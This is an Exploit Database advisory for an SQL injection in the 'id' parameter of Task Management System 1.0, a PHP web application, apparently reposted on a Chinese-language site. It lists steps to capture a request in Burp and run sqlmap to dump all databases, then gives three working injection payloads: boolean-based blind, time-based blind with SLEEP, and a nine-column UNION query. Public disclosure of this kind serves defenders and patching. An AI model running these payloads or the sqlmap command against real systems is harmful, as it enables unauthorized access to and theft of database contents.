Task Management System 1.0 – ‘id’ SQL Injection

• Exploit Database
• 14 阅读

• 作者： Saeed Bala Ahmed
  日期： 2020-12-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49224/

• # Exploit Title: Task Management System 1.0 - 'id' SQL Injection
  # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
  # Date: 2020-12-08
  # Google Dork: N/A
  # Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
  # Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
  # Affected Version: Version 1
  # Category: Web Application
  # Tested on: Parrot OS
  
  Step 1. Log into application with credentials
  Step 2. Click on Projects
  Step 3. Select View Projects
  Step 4. Choose any project, click on action and select view
  Step 5. Capture the request of the "page=view_project&id=" page in burpsute
  Step 6. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs "
  Step 7. This will inject successfully and you will have an information disclosure of all databases contents
  
  ---
  Parameter: id (GET)
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: page=view_project&id=3 AND 5169=5169
  
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: page=view_project&id=3 AND (SELECT 3991 FROM (SELECT(SLEEP(5)))NOXH)
  
  Type: UNION query
  Title: Generic UNION query (NULL) - 9 columns
  Payload: page=view_project&id=-2597 UNION ALL SELECT NULL,NULL,CONCAT(0x717a627a71,0x5a46784156705a6e654b6a454d44767155796a466f41436c6667585763424b534a4f4c4e52775a45,0x7176767071),NULL,NULL,NULL,NULL,NULL,NULL-- -
  ---